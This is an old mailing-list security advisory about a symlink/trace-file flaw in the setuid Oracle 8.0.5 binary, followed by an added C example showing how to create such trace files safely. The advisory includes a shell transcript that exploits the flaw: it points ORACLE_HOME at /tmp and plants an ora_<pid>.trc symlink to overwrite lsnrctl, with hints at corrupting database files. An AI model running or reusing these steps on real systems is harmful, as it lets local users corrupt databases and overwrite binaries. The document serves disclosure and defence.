vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6

From: Juan Manuel Pascual Escriba <pask_at_plazasite.com>
Date: Thu, 02 Aug 2001 07:56:31 -0700
Message-ID: <F001.0035D0FF.20010802010055@fatcity.com>

                      WWW.PLAZASITE.COM

                  System & Security Division





   Title:     Vulnerability in oracle binary in Oracle 8.0.5

    Date:     11-12-2000

Platform:     Only tested in Linux, but can be "exported" to others.

  Impact:     Any user can compromise any file owned by oracle (DDBB owner).

  Author:     Juan Manuel Pascual (pask_at_plazasite.com)

  Status:     Vendor Contacted at 18th July 2001


PROBLEM SUMMARY:
    There is a write permission checking error in the oracle binary that can be used by local users to write any file owned by oracle.

IMPACT:
    Any user with local access can corrupt the database, overwrite oracle binaries, etc.

SOLUTION:
    Chmod -s ;-)))).

STATUS:
    Vendor was contacted.



This vulnerability was researched by:
Juan Manuel Pascual Escriba pask_at_plazasite.com

Only for educational purposes. (Corrupting a ddbb isn't an educational purpose!)

[pask_at_proves1 /tmp]$
[pask_at_proves1 /tmp]$ mkdir rdbms
[pask_at_proves1 /tmp]$ cd rdbms/
[pask_at_proves1 rdbms]$ mkdir log
[pask_at_proves1 rdbms]$ cd log
[pask_at_proves1 log]$
[pask_at_proves1 log]$ ls -alc

total 8

drwxrwxr-x    2 pask     pask         4096 dic 14 02:33 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..

[pask_at_proves1 log]$ export ORACLE_HOME=/tmp
[pask_at_proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[pask_at_proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask_at_proves1 log]$ ls -alc

total 12
drwxrwxr-x    2 pask     pask         4096 dic 14 02:35 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..
-rw-r-----    1 oracle   pask           47 dic 14 02:35 ora_24028.trc

Upsssssssss a log owned by oracle with the structure ora_pid.trc I can create:
[pask_at_proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc

[pask_at_proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask_at_proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask_at_proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask_at_proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
.

..
...
until the log will be my link .. and I overwrite the binary. What about dbf files and go on ....

Received on Thu Aug 02 2001 - 09:56:31 CDT
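
The transcript above shows a setuid program creating ora_<pid>.trc beneath a caller-chosen ORACLE_HOME and writing through a symlink planted under that name. The following is an added example, not part of the original message and not Oracle's code, of how a privileged program can create such a trace file without following a link or trusting a directory it does not own. The function name open_trace_file and the 0640 mode are assumptions made for illustration.

```c
/* Added example, not Oracle code. open_trace_file() is a hypothetical name. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns an fd for a newly created ora_<pid>.trc in log_dir, or -1 if the
 * location cannot be trusted. */
int open_trace_file(const char *log_dir, long pid)
{
    char name[64];
    struct stat st;
    int dirfd, fd;

    /* Open the directory once; refuse if its last path component is a symlink. */
    dirfd = open(log_dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dirfd < 0)
        return -1;

    /* The directory must belong to the effective (privileged) user and must
     * not be writable by group or others, so nobody else can plant entries.
     * When the program runs setuid, a directory made by the caller fails here. */
    if (fstat(dirfd, &st) != 0 || st.st_uid != geteuid() ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(dirfd);
        return -1;
    }

    snprintf(name, sizeof name, "ora_%ld.trc", pid);
    /* O_CREAT|O_EXCL fails with EEXIST if the name already exists, including
     * as a symlink, so an existing file is never opened or truncated. */
    fd = openat(dirfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0640);
    close(dirfd);
    return fd;
}

int main(int argc, char **argv)
{
    int fd = open_trace_file(argc > 1 ? argv[1] : ".", (long)getpid());
    puts(fd >= 0 ? "trace file created" : "refused");
    return fd >= 0 ? 0 : 1;
}
```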
